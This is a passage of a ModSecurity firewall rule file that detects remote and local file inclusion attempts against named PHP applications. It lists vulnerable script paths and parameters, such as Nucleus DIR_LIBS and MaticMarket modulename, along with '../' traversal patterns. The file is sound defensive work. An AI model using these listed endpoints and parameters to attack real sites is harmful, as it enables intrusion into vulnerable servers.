Uploader example_1.php Remote File Inclusion attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:GLOBALS[MM_ROOT_DIRECTORY]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MassMirror Uploader example_1.php Remote File Inclusion attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012007) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpCow skin_file Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /plugins/templateie/lib/templateie_install.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012007,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS phpCow skin_file Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:skin_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpCow skin_file Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012008) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpCow skin_file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /plugins/templateie/lib/templateie_install.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012008,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS phpCow skin_file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:skin_file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpCow skin_file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012010) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Zen Cart loader_file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /includes/initsystem.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012010,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Zen Cart loader_file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:loader_file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Zen Cart loader_file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012013) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mambo Component com_smf smf.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_smf/smf.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012013,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Mambo Component com_smf smf.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mambo Component com_smf smf.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012014) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Jimtawl Component task Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012014,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Jimtawl Component task Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jimtawl" "chain" SecRule ARGS:task "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Jimtawl Component task Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012015) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebRCSdiff viewver.php File Inclusion Attempt SecRule REQUEST_LINE "@contains /viewver.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012015,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WebRCSdiff viewver.php File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:doc_root/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebRCSdiff viewver.php File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012022) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Community Builder Enhenced Component Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012022,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Community Builder Enhenced Component Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_cbe" "chain" SecRule REQUEST_LINE "@contains task=userProfile" "chain" SecRule ARGS:tabname "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Community Builder Enhenced Component Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012024) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Gbook MX newlangsel Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /gbookmx/gbook.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012024,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Gbook MX newlangsel Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:newlangsel/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Gbook MX newlangsel Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012025) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Seo Panel file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /download.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012025,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Seo Panel file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains filesec=sitemap" "chain" SecRule REQUEST_LINE "@contains filetype=text" "chain" SecRule ARGS:file "@contains ..//" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Seo Panel file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012031) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Abtp Portal Project skel_null.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /includes/esqueletos/skel_null.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012031,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Abtp Portal Project skel_null.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:ABTPV_BLOQUE_CENTRAL/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Abtp Portal Project skel_null.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012032) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Abtp Portal Project skel_null.php Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /includes/esqueletos/skel_null.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012032,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Abtp Portal Project skel_null.php Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:ABTPV_BLOQUE_CENTRAL "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Abtp Portal Project skel_null.php Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012033) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS N-13 News default_login_language Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /modules/login.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012033,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS N-13 News default_login_language Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:default_login_language "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS N-13 News default_login_language Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012069) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MantisBT db_type Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /admin/upgrade_unattended.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012069,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MantisBT db_type Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:db_type "(?i:\.\.\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MantisBT db_type Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012071) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Google Urchin session.cgi Local File Inclusion Attempt SecRule REQUEST_LINE "@contains app=urchin.cgi" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012071,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Google Urchin session.cgi Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains action=prop" "chain" SecRule ARGS:gfid "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Google Urchin session.cgi Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012122) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-1 SecRule REQUEST_LINE "@contains /modules/maticmarket/deco/blanc/haut.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012122,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-1',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012123) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-2 SecRule REQUEST_LINE "@contains /modules/maticmarket/deco/blanc/bas.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012123,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-2',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012124) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-3 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/blanc/haut.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012124,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-3',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-3',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012125) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-4 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/blanc/bas.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012125,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-4',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-4',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012126) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-5 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/default/haut.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012126,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-5',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-5',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012127) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-6 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/default/bas.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012127,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-6',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-6',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012128) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-7 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/gold/haut.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012128,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-7',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-7',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012129) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-8 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/gold/bas.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012129,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-8',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-8',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012130) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS myBloggie mybloggie_root_path Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /pingsvr.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012130,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS myBloggie mybloggie_root_path Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mybloggie_root_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS myBloggie mybloggie_root_path Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012165) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Concrete DIR_FILES_BLOCK_TYPES_CORE Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /blocks/file/controller.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012165,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Concrete DIR_FILES_BLOCK_TYPES_CORE Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,45669'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:DIR_FILES_BLOCK_TYPES_CORE/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Concrete DIR_FILES_BLOCK_TYPES_CORE Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012166) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_xmovie file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /com_xmovie/helpers/img.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012166,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_xmovie file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_xmovie file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012168) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Tiki Wiki CMS Groupware language Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /tiki-jsplugin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012168,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Tiki Wiki CMS Groupware language Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:language "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Tiki Wiki CMS Groupware language Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012181) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nucleus action.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /action.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012181,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Nucleus action.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:DIR_LIBS/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nucleus action.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012182) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nucleus media.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /nucleus/media.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012182,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Nucleus media.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:DIR_LIBS/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nucleus media.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012184) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nucleus server.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /nucleus/xmlrpc/server.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012184,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Nucleus server.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:DIR_LIBS/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nucleus server.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012185) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nucleus PLUGINADMIN.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /nucleus/libs/PLUGINADMIN.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012185,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Nucleus PLUGINADMIN.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:DIR_LIBS/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nucleus PLUGINADMIN.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012186) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS axdcms aXconf Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /modules/profile/user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012186,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS axdcms aXconf Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:aXconf[default_language] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS axdcms aXconf Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012217) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LetoDMS lang Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /op/op.Login.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012217,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS LetoDMS lang Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37828'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:lang "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LetoDMS lang Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012334) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Froxlor customer_ftp.php id Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /customer_ftp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012334,rev:3,msg:'SLR: ET 